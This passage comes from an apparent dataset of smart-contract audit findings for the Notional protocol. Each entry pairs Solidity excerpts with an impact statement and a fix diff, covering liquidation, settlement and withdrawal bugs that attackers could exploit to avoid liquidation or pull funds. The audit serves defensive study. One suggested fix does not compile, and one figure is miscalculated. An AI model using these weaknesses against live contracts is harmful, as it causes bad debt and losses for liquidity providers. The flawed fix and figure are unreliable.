Thus, the condition `actualTransferExternal > 0` will always be false, and the `_redeemAndTransfer` function will always revert.\\nThe `transferReserveToTreasury` function depends on `_redeemAndTransfer` function. Thus, it is not possible to transfer any asset to the treasury manager contract.чNegate the value returned by the `TokenHandler.withdrawPrimeCash` function.\\n```\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n// Remove the line below\\n );\\n// Add the line below\\n ).neg();\\n```\\nчThe fee collected by Notional is stored in the Fee Reserve. The fee reserve assets will be transferred to Notional's Treasury to be invested into the sNOTE pool. Without the ability to do so, the NOTE stakers will not receive their rewards.ч```\\nFile: TreasuryAction.sol\\n /// @notice redeems and transfers tokens to the treasury manager contract\\n function _redeemAndTransfer(uint16 currencyId, int256 primeCashRedeemAmount) private returns (uint256) {\\n PrimeRate memory primeRate = PrimeRateLib.buildPrimeRateStateful(currencyId);\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n );\\n\\n require(actualTransferExternal > 0);\\n return uint256(actualTransferExternal);\\n }\\n```\\n -Excess funds withdrawn from the money marketчhighчExcessive amounts of assets are being withdrawn from the money market.\\n```\\nFile: TokenHandler.sol\\n function _redeemMoneyMarketIfRequired(\\n uint16 currencyId,\\n Token memory underlying,\\n uint256 withdrawAmountExternal\\n ) private {\\n // If there is sufficient balance of the underlying to withdraw from the contract\\n // immediately, just return.\\n mapping(address => uint256) storage store = LibStorage.getStoredTokenBalances();\\n uint256 
currentBalance = store[underlying.tokenAddress];\\n if (withdrawAmountExternal <= currentBalance) return;\\n\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n // Redemption data returns an array of contract calls to make from the Notional proxy (which\\n // is holding all of the money market tokens).\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n\\n // This is the total expected underlying that we should redeem after all redemption calls\\n // are executed.\\n uint256 totalUnderlyingRedeemed = executeMoneyMarketRedemptions(underlying, data);\\n\\n // Ensure that we have sufficient funds before we exit\\n require(withdrawAmountExternal <= currentBalance.add(totalUnderlyingRedeemed)); // dev: insufficient redeem\\n }\\n```\\n\\nIf the `currentBalance` is `999,900` USDC and the `withdrawAmountExternal` is `1,000,000` USDC, then there is insufficient balance in the contract, and additional funds need to be withdrawn from the money market (e.g. Compound).\\nSince the contract already has `999,900` USDC, only an additional `100` USDC needs to be withdrawn from the money market to fulfill the withdrawal request of `1,000,000` USDC\\nHowever, instead of withdrawing `100` USDC from the money market, Notional withdraw `1,000,000` USDC from the market as per the `oracle.getRedemptionCalldata(withdrawAmountExternal)` function. 
As a result, an excess of `990,000` USDC is being withdrawn from the money marketчConsider withdrawing only the shortfall amount from the money market.\\n```\\n// Remove the line below\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n// Add the line below\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal // Remove the line below\\n currentBalance);\\n```\\nчThis led to an excessive amount of assets idling in Notional and not generating any returns or interest in the money market, which led to a loss of assets for the users as they would receive a lower interest rate than expected and incur opportunity loss.\\nAttackers could potentially abuse this to pull the funds Notional invested in the money market leading to griefing and loss of returns/interest for the protocol.ч```\\nFile: TokenHandler.sol\\n function _redeemMoneyMarketIfRequired(\\n uint16 currencyId,\\n Token memory underlying,\\n uint256 withdrawAmountExternal\\n ) private {\\n // If there is sufficient balance of the underlying to withdraw from the contract\\n // immediately, just return.\\n mapping(address => uint256) storage store = LibStorage.getStoredTokenBalances();\\n uint256 currentBalance = store[underlying.tokenAddress];\\n if (withdrawAmountExternal <= currentBalance) return;\\n\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n // Redemption data returns an array of contract calls to make from the Notional proxy (which\\n // is holding all of the money market tokens).\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n\\n // This is the total expected underlying that we should redeem after all redemption calls\\n // are executed.\\n uint256 totalUnderlyingRedeemed = executeMoneyMarketRedemptions(underlying, data);\\n\\n // Ensure that we have sufficient funds before we exit\\n require(withdrawAmountExternal <= 
currentBalance.add(totalUnderlyingRedeemed)); // dev: insufficient redeem\\n }\\n```\\n -Possible to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstandingчhighчIt is possible to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstanding. Thus, leaving accounts with small debt that are not profitable to unwind if it needs to liquidate.\\n```\\nFile: VaultValuation.sol\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. 
An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n \"Must Liquidate All Debt\"\\n );\\n```\\n\\n`depositUnderlyingInternal` is always a positive value (Refer to comment on Line 250) that represents the amount of underlying deposited by the liquidator\\n`h.debtOutstanding[currencyIndex]` is always a negative value representing debt outstanding of a specific currency in a vault account\\n`minBorrowSize` is always a positive value that represents the minimal borrow size of a specific currency (It is stored as uint32 in storage)\\nIf liquidating past the debt outstanding above the min borrow, then the entire debt outstanding must be liquidated.\\nAssume the following scenario:\\n`depositUnderlyingInternal` = `70 USDC`\\n`h.debtOutstanding[currencyIndex]` = `-100 USDC`\\n`minBorrowSize` = `50 USDC`\\nIf the liquidation is successful, the vault account should be left with `-30 USDC` debt outstanding because `70 USDC` has been paid off by the liquidator. 
However, this should not happen under normal circumstances because the debt outstanding (-30) does not meet the minimal borrow size of `50 USDC` and the liquidation should revert/fail.\\nThe following piece of validation logic attempts to ensure that all outstanding debt is liquidated if post-liquidation debt does not meet the minimal borrowing size.\\n```\\nrequire(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n \"Must Liquidate All Debt\"\\n);\\n```\\n\\nPlugging in the values from our scenario to verify if the code will revert if the debt outstanding does not meet the minimal borrow size.\\n```\\nrequire(\\n (-100 USDC - 70 USDC) < 50 USDC\\n);\\n===>\\nrequire(\\n (-170 USDC) < 50 USDC\\n);\\n===>\\nrequire(true) // no revert\\n```\\n\\nThe above shows that it is possible for someone to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstanding. This shows that the math formula in the code is incorrect and not working as intended.чUpdate the formula to as follows:\\n```\\nrequire(\\n// Remove the line below\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n// Add the line below\\n h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) > minBorrowSize,\\n \"Must Liquidate All Debt\"\\n);\\n```\\n\\nPlugging in the values from our scenario again to verify if the code will revert if the debt outstanding does not meet the minimal borrow size.\\n```\\nrequire(\\n ((-100 USDC).neg() - 70 USDC) > 50 USDC\\n);\\n===>\\nrequire(\\n (100 USDC - 70 USDC) > 50 USDC\\n);\\n===>\\nrequire(\\n (30 USDC) > 50 USDC\\n);\\n===>\\nrequire(false) // revert\\n```\\n\\nThe above will trigger a revert as expected when the debt outstanding does not meet the minimal borrow size.чA liquidation can bring an account below the minimum debt. 
Accounts smaller than the minimum debt are not profitable to unwind if it needs to liquidate (Reference)\\nAs a result, liquidators are not incentivized to liquidate those undercollateralized positions. This might leave the protocol with bad debts, potentially leading to insolvency if the bad debts accumulate.ч```\\nFile: VaultValuation.sol\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n \"Must Liquidate All Debt\"\\n );\\n```\\n -Vaults can avoid liquidations by not letting their vault account be settledчhighчVault liquidations will leave un-matured accounts with cash holdings which are then used to offset account debt during vault account settlements. As it stands, any excess cash received via interest accrual will be transferred back to the vault account directly. If a primary or secondary borrow currency is `ETH`, then this excess cash will be transferred natively. Consequently, the recipient may intentionally revert, causing account settlement to fail.\\nThe issue arises in the `VaultAccount.repayAccountPrimeDebtAtSettlement()` function. 
If there is any excess cash due to interest accrual, then this amount will be refunded to the vault account. Native `ETH` is not wrapped when it should be wrapped, allowing the recipient to take control over the flow of execution.\\n```\\nFile: VaultAccount.sol\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. 
The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n\\n // Updates the global prime debt figure and events are emitted via the vault.\\n pr.updateTotalPrimeDebt(vault, currencyId, netPrimeDebtChange);\\n\\n // Updates the state on the prime vault storage directly.\\n int256 totalPrimeDebt = int256(uint256(primeVaultState.totalDebt));\\n int256 newTotalDebt = totalPrimeDebt.add(netPrimeDebtChange);\\n // Set the total debt to the storage value\\n primeVaultState.totalDebt = newTotalDebt.toUint().toUint80();\\n }\\n }\\n```\\n\\nAs seen here, a `withdrawWrappedNativeToken` is used to signify when a native `ETH` transfer will be wrapped before sending an amount. 
In the case of vault settlement, this is always set to `false`.\\n```\\nFile: TokenHandler.sol\\n function withdrawPrimeCash(\\n address account,\\n uint16 currencyId,\\n int256 primeCashToWithdraw,\\n PrimeRate memory primeRate,\\n bool withdrawWrappedNativeToken\\n ) internal returns (int256 netTransferExternal) {\\n if (primeCashToWithdraw == 0) return 0;\\n require(primeCashToWithdraw < 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n netTransferExternal = convertToExternal(\\n underlying, \\n primeRate.convertToUnderlying(primeCashToWithdraw) \\n );\\n\\n // Overflow not possible due to int256\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n _redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n\\n if (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n } else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n }\\n\\n _postTransferPrimeCashUpdate(account, currencyId, netTransferExternal, underlying, primeRate);\\n }\\n```\\n\\nIt's likely that the vault account is considered solvent in this case, but due to the inability to trade between currencies, it is not possible to use excess cash in one currency to offset debt in another.чConsider wrapping `ETH` under all circumstances. 
This will prevent vault accounts from intentionally reverting and preventing their account from being settled.чLiquidations require vaults to be settled if `block.timestamp` is past the maturity date, hence, it is not possible to deleverage vault accounts, leading to bad debt accrual.ч```\\nFile: VaultAccount.sol\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. 
The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n\\n // Updates the global prime debt figure and events are emitted via the vault.\\n pr.updateTotalPrimeDebt(vault, currencyId, netPrimeDebtChange);\\n\\n // Updates the state on the prime vault storage directly.\\n int256 totalPrimeDebt = int256(uint256(primeVaultState.totalDebt));\\n int256 newTotalDebt = totalPrimeDebt.add(netPrimeDebtChange);\\n // Set the total debt to the storage value\\n primeVaultState.totalDebt = newTotalDebt.toUint().toUint80();\\n }\\n }\\n```\\n -Possible to create vault positions ineligible for liquidationчhighчUsers can self-liquidate their secondary debt holdings in such a way that it is no longer possible to deleverage their vault account as `checkMinBorrow` will fail post-maturity.\\nWhen deleveraging a vault account, the liquidator will pay down account debt directly and the account will not accrue any cash. Under most circumstances, it is not possible to put an account's debt below its minimum borrow size.\\nHowever, there are two exceptions to this:\\nLiquidators purchasing cash from a vault account. 
This only applies to non-prime vault accounts.\\nA vault account is being settled and `checkMinBorrow` is skipped to ensure an account can always be settled.\\n```\\nFile: VaultLiquidationAction.sol\\n function deleverageAccount(\\n address account,\\n address vault,\\n address liquidator,\\n uint16 currencyIndex,\\n int256 depositUnderlyingInternal\\n ) external payable nonReentrant override returns (\\n uint256 vaultSharesToLiquidator,\\n int256 depositAmountPrimeCash\\n ) {\\n require(currencyIndex < 3);\\n (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) = _authenticateDeleverage(account, vault, liquidator);\\n\\n PrimeRate memory pr;\\n // Currency Index is validated in this method\\n (\\n depositUnderlyingInternal,\\n vaultSharesToLiquidator,\\n pr\\n ) = IVaultAccountHealth(address(this)).calculateDepositAmountInDeleverage(\\n currencyIndex, vaultAccount, vaultConfig, vaultState, depositUnderlyingInternal\\n );\\n\\n uint16 currencyId = vaultConfig.borrowCurrencyId;\\n if (currencyIndex == 1) currencyId = vaultConfig.secondaryBorrowCurrencies[0];\\n else if (currencyIndex == 2) currencyId = vaultConfig.secondaryBorrowCurrencies[1];\\n\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // Excess ETH is returned to the liquidator natively\\n (/* */, depositAmountPrimeCash) = TokenHandler.depositUnderlyingExternal(\\n liquidator, currencyId, token.convertToExternal(depositUnderlyingInternal), pr, false \\n );\\n\\n // Do not skip the min borrow check here\\n vaultAccount.vaultShares = vaultAccount.vaultShares.sub(vaultSharesToLiquidator);\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Vault account will not incur a cash balance if they are in the prime cash maturity, their debts\\n // will be paid down directly.\\n _reduceAccountDebt(\\n vaultConfig, vaultState, vaultAccount, pr, currencyIndex, depositUnderlyingInternal, true\\n );\\n 
depositAmountPrimeCash = 0;\\n }\\n\\n // Check min borrow in this liquidation method, the deleverage calculation should adhere to the min borrow\\n vaultAccount.setVaultAccountForLiquidation(vaultConfig, currencyIndex, depositAmountPrimeCash, true);\\n\\n emit VaultDeleverageAccount(vault, account, currencyId, vaultSharesToLiquidator, depositAmountPrimeCash);\\n emit VaultLiquidatorProfit(vault, account, liquidator, vaultSharesToLiquidator, true);\\n\\n _transferVaultSharesToLiquidator(\\n liquidator, vaultConfig, vaultSharesToLiquidator, vaultAccount.maturity\\n );\\n\\n Emitter.emitVaultDeleverage(\\n liquidator, account, vault, currencyId, vaultState.maturity,\\n depositAmountPrimeCash, vaultSharesToLiquidator\\n );\\n }\\n```\\n\\n`currencyIndex` represents which currency is being liquidated and `depositUnderlyingInternal` the amount of debt being reduced. Only one currency's debt can be updated here.\\n```\\nFile: VaultLiquidationAction.sol\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n pr[currencyIndex - 1] = primeRate;\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? 
depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\n\\nIn the case of vault settlement, through self-liquidation, users can setup their debt and cash holdings post-settlement, such that both `accountDebtOne` and `accountDebtTwo` are non-zero and less than `vaultConfig.minAccountSecondaryBorrow`. The objective would be to have zero primary debt and `Y` secondary debt and `X` secondary cash. Post-settlement, cash is used to offset debt (Y - `X` < minAccountSecondaryBorrow) and due to the lack of `checkMinBorrow` in `VaultAccountAction.settleVaultAccount()`, both secondary currencies can have debt holdings below the minimum amount.\\nNow when `deleverageAccount()` is called on a prime vault account, debts are paid down directly. However, if we are only able to pay down one secondary currency at a time, `checkMinBorrow` will fail in `VaultSecondaryBorrow.updateAccountSecondaryDebt()` because both debts are checked.\\n```\\nFile: VaultSecondaryBorrow.sol\\n if (checkMinBorrow) {\\n // No overflow on negation due to overflow checks above\\n require(accountDebtOne == 0 || vaultConfig.minAccountSecondaryBorrow[0] <= -accountDebtOne, \"min borrow\");\\n require(accountDebtTwo == 0 || vaultConfig.minAccountSecondaryBorrow[1] <= -accountDebtTwo, \"min borrow\");\\n }\\n```\\n\\nNo prime fees accrue on secondary debt, hence, this debt will never reach a point where it is above the minimum borrow amount.чEither allow for multiple currencies to be liquidated or ensure that `checkMinBorrow` is performed only on the currency which is being liquidated.чMalicious actors can generate vault accounts which cannot be liquidated. 
Through opening numerous vault positions, Notional can rack up significant exposure and accrue bad debt as a result.ч```\\nFile: VaultLiquidationAction.sol\\n function deleverageAccount(\\n address account,\\n address vault,\\n address liquidator,\\n uint16 currencyIndex,\\n int256 depositUnderlyingInternal\\n ) external payable nonReentrant override returns (\\n uint256 vaultSharesToLiquidator,\\n int256 depositAmountPrimeCash\\n ) {\\n require(currencyIndex < 3);\\n (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) = _authenticateDeleverage(account, vault, liquidator);\\n\\n PrimeRate memory pr;\\n // Currency Index is validated in this method\\n (\\n depositUnderlyingInternal,\\n vaultSharesToLiquidator,\\n pr\\n ) = IVaultAccountHealth(address(this)).calculateDepositAmountInDeleverage(\\n currencyIndex, vaultAccount, vaultConfig, vaultState, depositUnderlyingInternal\\n );\\n\\n uint16 currencyId = vaultConfig.borrowCurrencyId;\\n if (currencyIndex == 1) currencyId = vaultConfig.secondaryBorrowCurrencies[0];\\n else if (currencyIndex == 2) currencyId = vaultConfig.secondaryBorrowCurrencies[1];\\n\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // Excess ETH is returned to the liquidator natively\\n (/* */, depositAmountPrimeCash) = TokenHandler.depositUnderlyingExternal(\\n liquidator, currencyId, token.convertToExternal(depositUnderlyingInternal), pr, false \\n );\\n\\n // Do not skip the min borrow check here\\n vaultAccount.vaultShares = vaultAccount.vaultShares.sub(vaultSharesToLiquidator);\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Vault account will not incur a cash balance if they are in the prime cash maturity, their debts\\n // will be paid down directly.\\n _reduceAccountDebt(\\n vaultConfig, vaultState, vaultAccount, pr, currencyIndex, depositUnderlyingInternal, true\\n );\\n depositAmountPrimeCash = 0;\\n }\\n\\n // Check min borrow 
in this liquidation method, the deleverage calculation should adhere to the min borrow\\n vaultAccount.setVaultAccountForLiquidation(vaultConfig, currencyIndex, depositAmountPrimeCash, true);\\n\\n emit VaultDeleverageAccount(vault, account, currencyId, vaultSharesToLiquidator, depositAmountPrimeCash);\\n emit VaultLiquidatorProfit(vault, account, liquidator, vaultSharesToLiquidator, true);\\n\\n _transferVaultSharesToLiquidator(\\n liquidator, vaultConfig, vaultSharesToLiquidator, vaultAccount.maturity\\n );\\n\\n Emitter.emitVaultDeleverage(\\n liquidator, account, vault, currencyId, vaultState.maturity,\\n depositAmountPrimeCash, vaultSharesToLiquidator\\n );\\n }\\n```\\n -Partial liquidations are not possibleчhighчDue to an incorrect implementation of `VaultValuation.getLiquidationFactors()`, Notional requires that a liquidator reduces an account's debt below `minBorrowSize`. This does not allow liquidators to partially liquidate a vault account into a healthy position and opens up the protocol to an edge case where an account is always ineligible for liquidation.\\nWhile `VaultValuation.getLiquidationFactors()` might allow for the resultant outstanding debt to be below the minimum borrow amount and non-zero, `deleverageAccount()` will revert due to `checkMinBorrow` being set to `true`. 
Therefore, the only option is for liquidators to wipe the outstanding debt entirely but users can set up their vault accounts such that that `maxLiquidatorDepositLocal` is less than each of the vault currency's outstanding debt.\\n```\\nFile: VaultValuation.sol\\n int256 maxLiquidatorDepositLocal = _calculateDeleverageAmount(\\n vaultConfig,\\n h.vaultShareValueUnderlying,\\n h.totalDebtOutstandingInPrimary.neg(),\\n h.debtOutstanding[currencyIndex].neg(),\\n minBorrowSize,\\n exchangeRate,\\n er.rateDecimals\\n );\\n\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n \"Must Liquidate All Debt\"\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\n\\nIf `depositUnderlyingInternal >= maxLiquidatorDepositLocal`, then the liquidator's deposit is capped to `maxLiquidatorDepositLocal`. 
However, `maxLiquidatorDepositLocal` may put the vault account's outstanding debt below the minimum borrow amount but not to zero.\\nHowever, because it is not possible to partially liquidate the account's debt, we reach a deadlock where it isn't possible to liquidate all outstanding debt and it also isn't possible to liquidate debt partially. So even though it may be possible to liquidate an account into a healthy position, the current implementation doesn't always allow for this to be true.ч`VaultValuation.getLiquidationFactors()` must be updated to allow for partial liquidations.\\n```\\nFile: VaultValuation.sol\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) >= minBorrowSize,\\n || h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) == 0\\n \"Must Liquidate All Debt\"\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\nчCertain vault positions will never be eligible for liquidation and hence Notional may be left with bad debt. 
Liquidity providers will lose funds as they must cover the shortfall for undercollateralised positions.ч```\\nFile: VaultValuation.sol\\n int256 maxLiquidatorDepositLocal = _calculateDeleverageAmount(\\n vaultConfig,\\n h.vaultShareValueUnderlying,\\n h.totalDebtOutstandingInPrimary.neg(),\\n h.debtOutstanding[currencyIndex].neg(),\\n minBorrowSize,\\n exchangeRate,\\n er.rateDecimals\\n );\\n\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n \"Must Liquidate All Debt\"\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\n -Vault accounts with excess cash can avoid being settledчhighчIf excess cash was transferred out from an account during account settlement, then the protocol will check the account's collateral ratio and revert if the position is unhealthy. 
Because it may not be possible to settle a vault account, liquidators cannot reduce account debt by purchasing vault shares because `_authenticateDeleverage()` will check to see if a vault has matured.\\nConsidering an account's health is determined by a combination of its outstanding debt, cash holdings and the total underlying value of its vault shares, transferring out excess cash may actually put an account in an unhealthy position.\\n```\\nFile: VaultAccountAction.sol\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, \"No Settle\");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. 
If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n\\nIt is important to note that all vault liquidation actions require a vault to first be settled. Hence, through self-liquidation, sophisticated vault accounts can have excess cash in one currency and significant debt holdings in the vault's other currencies.\\n```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n 